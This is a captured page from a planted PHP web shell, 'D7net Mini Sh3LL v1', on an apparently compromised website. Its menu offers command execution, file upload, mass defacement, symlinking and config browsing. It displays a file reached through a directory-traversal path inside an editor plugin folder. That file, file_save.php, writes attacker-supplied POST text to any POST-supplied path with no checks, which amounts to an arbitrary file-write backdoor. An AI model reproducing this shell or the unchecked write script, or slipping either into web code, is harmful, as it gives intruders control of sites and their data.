D7net Mini Sh3LL v1

 
ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/Domains/maymaytinson.com/httpdocs/filebrowser/../ckeditor/plugins/bootstrapTable/../mathjax/../video/../mathjax/../autocorrect/../easyimage/../zamanager/commands/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : C:/Domains/maymaytinson.com/httpdocs/filebrowser/../ckeditor/plugins/bootstrapTable/../mathjax/../video/../mathjax/../autocorrect/../easyimage/../zamanager/commands/file_save.php
<?php

$dir=$_POST['dir'];
$text=$_POST['text'];
$myfile = fopen($dir, "w") or die("Unable to open file!");
fwrite($myfile, $text);
fclose($myfile);
echo "File ".$name." was SAVED";

AnonSec - 2021 | Recode By D7net